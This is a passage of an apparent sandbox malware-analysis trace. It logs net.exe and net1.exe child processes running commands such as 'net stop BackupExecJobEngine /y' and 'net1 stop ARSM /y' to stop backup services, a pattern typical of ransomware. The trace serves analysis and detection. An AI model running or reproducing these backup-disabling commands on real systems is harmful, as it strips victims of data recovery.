_Radix=1898368 | out: _Dest=0x889) returned="2185" [0089.663] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0089.663] GetFileType (hFile=0xb) returned 0x2 [0089.663] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf718 | out: lpMode=0x1cf718) returned 1 [0089.663] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf710, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x1cf710*=0x34) returned 1 [0089.664] GetFileType (hFile=0xb) returned 0x2 [0089.664] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf718 | out: lpMode=0x1cf718) returned 1 [0089.664] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf710, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x1cf710*=0x2) returned 1 [0089.664] NetApiBufferFree (Buffer=0x334d60) returned 0x0 [0089.664] NetApiBufferFree (Buffer=0x33c130) returned 0x0 [0089.665] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0089.665] exit (_Code=2) Process: id = "95" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6ceb8000" os_pid = "0x1148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4938 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4939 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4940 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4941 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4942 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4943 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4944 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4945 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4946 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4947 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4948 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4949 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4950 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4951 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4952 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 489 os_tid = 0x114c Process: id = "96" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x20aea000" os_pid = "0x1158" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "87" os_parent_pid = "0x10b8" cmd_line = "C:\\Windows\\system32\\net1 stop ARSM /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4953 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4954 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4955 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4956 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4957 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4958 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4959 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4960 start_va = 0xffe70000 end_va = 0xffea2fff entry_point = 0xffe70000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4961 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4962 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4963 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4964 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4965 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4966 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4967 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4968 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4969 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4970 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4971 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4972 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4973 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4974 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4975 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4976 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4977 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4978 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4979 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4980 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4981 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4982 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4983 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4984 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4985 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4986 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4987 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4988 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4989 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4990 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5068 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 491 os_tid = 0x115c [0089.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb90 | out: lpSystemTimeAsFileTime=0x1afb90*(dwLowDateTime=0xea92fc90, dwHighDateTime=0x1d48689)) [0089.598] GetCurrentProcessId () returned 0x1158 [0089.598] GetCurrentThreadId () returned 0x115c [0089.598] GetTickCount () returned 0x203e6 [0089.598] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb98 | out: lpPerformanceCount=0x1afb98*=1813651600000) returned 1 [0089.600] GetModuleHandleW (lpModuleName=0x0) returned 0xffe70000 [0089.600] __set_app_type (_Type=0x1) [0089.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe89c9c) returned 0x0 [0089.600] __getmainargs (in: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788, _DoWildCard=0, _StartInfo=0xffe9479c | out: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788) returned 0 [0089.600] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.600] GetConsoleOutputCP () returned 0x1b5 [0089.699] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe9cec0 | out: lpCPInfo=0xffe9cec0) returned 1 [0089.699] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.702] sprintf_s (in: _DstBuf=0x1afb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0089.702] setlocale (category=0, locale=".437") returned="English_United States.437" [0089.703] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0089.703] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0089.703] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ARSM /y" [0089.703] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0089.704] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0089.704] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afb28 | out: Buffer=0x1afb28*=0x224d40) returned 0x0 [0089.704] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afb28 | out: Buffer=0x1afb28*=0x22c0e0) returned 0x0 [0089.704] _fileno (_File=0x7fefdba2a80) returned 0 [0089.704] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0089.704] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0089.704] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0089.704] _wcsicmp (_String1="config", _String2="stop") returned -16 [0089.704] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0089.704] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0089.704] _wcsicmp (_String1="file", _String2="stop") returned -13 [0089.704] _wcsicmp (_String1="files", _String2="stop") returned -13 [0089.704] _wcsicmp (_String1="group", _String2="stop") returned -12 [0089.704] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0089.704] _wcsicmp (_String1="help", _String2="stop") returned -11 [0089.704] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0089.704] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0089.704] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0089.704] _wcsicmp (_String1="session", _String2="stop") returned -15 [0089.704] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0089.704] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0089.704] _wcsicmp (_String1="share", _String2="stop") returned -12 [0089.705] _wcsicmp (_String1="start", _String2="stop") returned -14 [0089.705] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0089.705] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0089.705] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0089.705] _wcsicmp (_String1="accounts", _String2="ARSM") returned -15 [0089.705] _wcsicmp (_String1="computer", _String2="ARSM") returned 2 [0089.705] _wcsicmp (_String1="config", _String2="ARSM") returned 2 [0089.705] _wcsicmp (_String1="continue", _String2="ARSM") returned 2 [0089.705] _wcsicmp (_String1="cont", _String2="ARSM") returned 2 [0089.705] _wcsicmp (_String1="file", _String2="ARSM") returned 5 [0089.705] _wcsicmp (_String1="files", _String2="ARSM") returned 5 [0089.705] _wcsicmp (_String1="group", _String2="ARSM") returned 6 [0089.705] _wcsicmp (_String1="groups", _String2="ARSM") returned 6 [0089.705] _wcsicmp (_String1="help", _String2="ARSM") returned 7 [0089.705] _wcsicmp (_String1="helpmsg", _String2="ARSM") returned 7 [0089.705] _wcsicmp (_String1="localgroup", _String2="ARSM") returned 11 [0089.705] _wcsicmp (_String1="pause", _String2="ARSM") returned 15 [0089.705] _wcsicmp (_String1="session", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="sessions", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="sess", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="share", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="start", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="stats", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="statistics", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="stop", _String2="ARSM") returned 18 [0089.705] _wcsicmp (_String1="time", _String2="ARSM") returned 19 [0089.705] _wcsicmp (_String1="user", _String2="ARSM") returned 20 [0089.705] _wcsicmp (_String1="users", _String2="ARSM") returned 20 [0089.705] _wcsicmp (_String1="msg", _String2="ARSM") returned 12 [0089.705] _wcsicmp (_String1="messenger", _String2="ARSM") returned 12 [0089.705] _wcsicmp (_String1="receiver", _String2="ARSM") returned 17 [0089.705] _wcsicmp (_String1="rcv", _String2="ARSM") returned 17 [0089.705] _wcsicmp (_String1="netpopup", _String2="ARSM") returned 13 [0089.706] _wcsicmp (_String1="redirector", _String2="ARSM") returned 17 [0089.706] _wcsicmp (_String1="redir", _String2="ARSM") returned 17 [0089.706] _wcsicmp (_String1="rdr", _String2="ARSM") returned 17 [0089.706] _wcsicmp (_String1="workstation", _String2="ARSM") returned 22 [0089.706] _wcsicmp (_String1="work", _String2="ARSM") returned 22 [0089.706] _wcsicmp (_String1="wksta", _String2="ARSM") returned 22 [0089.706] _wcsicmp (_String1="prdr", _String2="ARSM") returned 15 [0089.706] _wcsicmp (_String1="devrdr", _String2="ARSM") returned 3 [0089.706] _wcsicmp (_String1="lanmanworkstation", _String2="ARSM") returned 11 [0089.706] _wcsicmp (_String1="server", _String2="ARSM") returned 18 [0089.706] _wcsicmp (_String1="svr", _String2="ARSM") returned 18 [0089.706] _wcsicmp (_String1="srv", _String2="ARSM") returned 18 [0089.706] _wcsicmp (_String1="lanmanserver", _String2="ARSM") returned 11 [0089.706] _wcsicmp (_String1="alerter", _String2="ARSM") returned -6 [0089.706] _wcsicmp (_String1="netlogon", _String2="ARSM") returned 13 [0089.706] _wcsupr (in: _String="ARSM" | out: _String="ARSM") returned="ARSM" [0089.706] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x22c900 [0089.710] GetServiceKeyNameW (in: hSCManager=0x22c900, lpDisplayName="ARSM", lpServiceName=0xffe95750, lpcchBuffer=0x1afa48 | out: lpServiceName="", lpcchBuffer=0x1afa48) returned 0 [0089.711] _wcsicmp (_String1="msg", _String2="ARSM") returned 12 [0089.711] _wcsicmp (_String1="messenger", _String2="ARSM") returned 12 [0089.711] _wcsicmp (_String1="receiver", _String2="ARSM") returned 17 [0089.711] _wcsicmp (_String1="rcv", _String2="ARSM") returned 17 [0089.711] _wcsicmp (_String1="redirector", _String2="ARSM") returned 17 [0089.711] _wcsicmp (_String1="redir", _String2="ARSM") returned 17 [0089.712] _wcsicmp (_String1="rdr", _String2="ARSM") returned 17 [0089.712] _wcsicmp (_String1="workstation", _String2="ARSM") returned 22 [0089.712] _wcsicmp (_String1="work", _String2="ARSM") returned 22 [0089.712] _wcsicmp (_String1="wksta", _String2="ARSM") returned 22 [0089.712] _wcsicmp (_String1="prdr", _String2="ARSM") returned 15 [0089.712] _wcsicmp (_String1="devrdr", _String2="ARSM") returned 3 [0089.712] _wcsicmp (_String1="lanmanworkstation", _String2="ARSM") returned 11 [0089.712] _wcsicmp (_String1="server", _String2="ARSM") returned 18 [0089.712] _wcsicmp (_String1="svr", _String2="ARSM") returned 18 [0089.712] _wcsicmp (_String1="srv", _String2="ARSM") returned 18 [0089.712] _wcsicmp (_String1="lanmanserver", _String2="ARSM") returned 11 [0089.712] _wcsicmp (_String1="alerter", _String2="ARSM") returned -6 [0089.712] _wcsicmp (_String1="netlogon", _String2="ARSM") returned 13 [0089.712] NetServiceControl (in: servername=0x0, service="ARSM", opcode=0x0, arg=0x0, bufptr=0x1afa50 | out: bufptr=0x1afa50) returned 0x889 [0089.713] wcscpy_s (in: _Destination=0xffe980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0089.713] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0089.714] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0089.715] GetFileType (hFile=0xb) returned 0x2 [0089.716] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af918 | out: lpMode=0x1af918) returned 1 [0089.716] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af910, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x1af910*=0x1e) returned 1 [0089.716] GetFileType (hFile=0xb) returned 0x2 [0089.716] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af918 | out: lpMode=0x1af918) returned 1 [0089.717] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af910, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x1af910*=0x2) returned 1 [0089.717] _ultow (in: _Dest=0x889, _Radix=1767808 | out: _Dest=0x889) returned="2185" [0089.717] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0089.717] GetFileType (hFile=0xb) returned 0x2 [0089.717] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af918 | out: lpMode=0x1af918) returned 1 [0089.718] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af910, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x1af910*=0x34) returned 1 [0089.718] GetFileType (hFile=0xb) returned 0x2 [0089.718] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af918 | out: lpMode=0x1af918) returned 1 [0089.718] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af910, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x1af910*=0x2) returned 1 [0089.719] NetApiBufferFree (Buffer=0x224d40) returned 0x0 [0089.719] NetApiBufferFree (Buffer=0x22c0e0) returned 0x0 [0089.719] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ARSM /y" [0089.719] exit (_Code=2) Process: id = "97" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6d946000" os_pid = "0x1160" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "91" os_parent_pid = "0x10ec" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4991 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4992 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4993 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4994 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4995 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4996 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4997 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4998 start_va = 0xffe70000 end_va = 0xffea2fff entry_point = 0xffe70000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4999 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5000 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5001 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5002 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5003 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 5004 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5005 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5006 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5007 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5008 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5009 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 5010 start_va = 